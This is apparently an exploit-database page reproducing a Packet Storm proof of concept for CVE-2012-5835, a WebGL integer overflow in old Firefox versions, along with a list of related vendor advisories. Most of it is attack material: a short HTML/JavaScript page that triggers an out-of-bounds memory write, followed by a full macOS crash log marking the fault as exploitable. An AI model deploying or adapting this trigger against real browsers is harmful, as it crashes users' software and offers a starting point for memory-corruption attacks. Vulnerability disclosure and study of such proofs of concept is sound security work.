Mozilla Firefox WebGL Proof Of Concept

🗓️ 15 Feb 2017 00:00:00Reported by Bikash DashType

packetstorm🔗 packetstormsecurity.com👁 55 Views

Integer overflow in Mozilla Firefox WebGL syste

Reporter	Title	Published	Views	Family All 132
IBM Security Bulletins	Security Bulletin: SONAS Update Includes Fixes for Multiple Vendor Security Vulnerabilities	26 Sep 202204:23	–	ibm
IBM Security Bulletins	Security Bulletin: Storwize V7000 Unified V1.4.1.0 Includes Fixes for Multiple Vendor Security Vulnerabilities	26 Sep 202204:23	–	ibm
Tenable Nessus	Mozilla Firefox < 17.0 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	SeaMonkey 2.x < 2.14 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	Mozilla Thunderbird < 17.0 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	Mozilla Firefox 16.x <= 16 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	Mozilla SeaMonkey 2.x <= 2.13 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	Mozilla Thunderbird 16.x <= 16 Multiple Vulnerabilities	29 Nov 201200:00	–	nessus
Tenable Nessus	CentOS 5 / 6 : firefox (CESA-2012:1482)	23 Nov 201200:00	–	nessus
Tenable Nessus	CentOS 5 / 6 : thunderbird (CESA-2012:1483)	23 Nov 201200:00	–	nessus

`# Exploit Title: Integer overflow happens WebGL system in Mozila Firefox  
# Date: 15-02-2017  
# Software Link: https://www.mozilla.org/en-US/firefox/new/  
# Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash  
#Tested On:MAC OS x86  
# Website: http://vulnerableghost.com/  
# CVE: CVE-2012-5835  
# Category: webapps(Mozila)  
<html>  
<head>  
<script>  
gl=document.createElement('canvas').getContext('experimental-webgl')  
var buf = gl.createBuffer()  
gl.bindBuffer(gl.ARRAY_BUFFER, buf)  
var magic = 0x12345678  
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)  
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)  
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))  
</script>  
</head>  
</html>  
Crash Information:  
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:  
Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes.  
Test case was b291.html  
  
  
Process: firefox [3732]  
Path: /Applications/Firefox.app/Contents/MacOS/firefox  
Identifier: firefox  
Version: ??? (???)  
Code Type: X86-64 (Native)  
Parent Process: exc_handler [3731]  
  
Date/Time: 2017-02-15 10:44:52.818 +0300  
OS Version: Mac OS X 10.8.1 (12B19)  
Report Version: 9  
  
Crashed Thread: 0 Dispatch queue: com.apple.main-thread  
  
Exception Type: EXC_BAD_ACCESS (SIGSEGV)  
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678  
  
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread  
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57  
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856  
2 XUL 0x00000001020df955 0x10111a000 + 16537941  
3 XUL 0x000000010257424b 0x10111a000 + 21340747  
4 XUL 0x0000000102564622 0x10111a000 + 21276194  
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850  
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369  
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133  
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053  
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107  
10 XUL 0x000000010182121d 0x10111a000 + 7369245  
11 XUL 0x00000001015ef000 0x10111a000 + 5066752  
12 XUL 0x00000001015f0538 0x10111a000 + 5072184  
13 XUL 0x00000001015f117a 0x10111a000 + 5075322  
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869  
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294  
16 XUL 0x00000001019a6285 0x10111a000 + 8962693  
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813  
18 XUL 0x00000001021324f3 0x10111a000 + 16876787  
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366  
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313  
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759  
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17  
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245  
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789  
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290  
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209  
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356  
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62  
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685  
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128  
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818  
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517  
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821  
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252  
35 XUL 0x0000000101121193 0x10111a000 + 29075  
36 XUL 0x0000000101125fbb 0x10111a000 + 49083  
37 XUL 0x00000001011264c3 XRE_main + 307  
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701  
39 org.mozilla.firefox 0x0000000100001584 start + 52  
  
Thread 0 crashed with X86 Thread State (64-bit):  
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001  
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0  
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678  
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001  
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678  
Logical CPU: 2  
`

15 Feb 2017 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.08528